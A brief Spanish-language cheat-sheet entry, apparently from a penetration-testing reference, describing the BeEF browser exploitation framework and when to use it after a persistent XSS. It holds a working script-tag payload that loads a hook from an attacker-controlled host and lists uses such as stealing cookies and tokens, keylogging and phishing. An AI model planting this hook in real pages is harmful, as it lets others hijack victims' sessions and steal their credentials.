BeEF hook

beef-xss (framework); payload: <script src="http://<beef-host>:3000/hook.js"></script>

Framework de explotación de navegadores que permite controlar la víctima tras un XSS persistente.

Cuando has encontrado un XSS y quieres explotarlo para obtener información del navegador, cookies, tokens, o incluso controlar la sesión del usuario. BeEF te da una interfaz para enviar comandos (social engineering, redirección, keylogging, etc.) a la víctima. Es útil en ataques de phishing o en pruebas de concienciación.

Si el objetivo no usa JavaScript o tiene CSP restrictivo que bloquea scripts externos. También si el XSS es reflejado y no persistente, la ventana de oportunidad es corta. Prefiere herramientas más simples si solo necesitas robar cookies.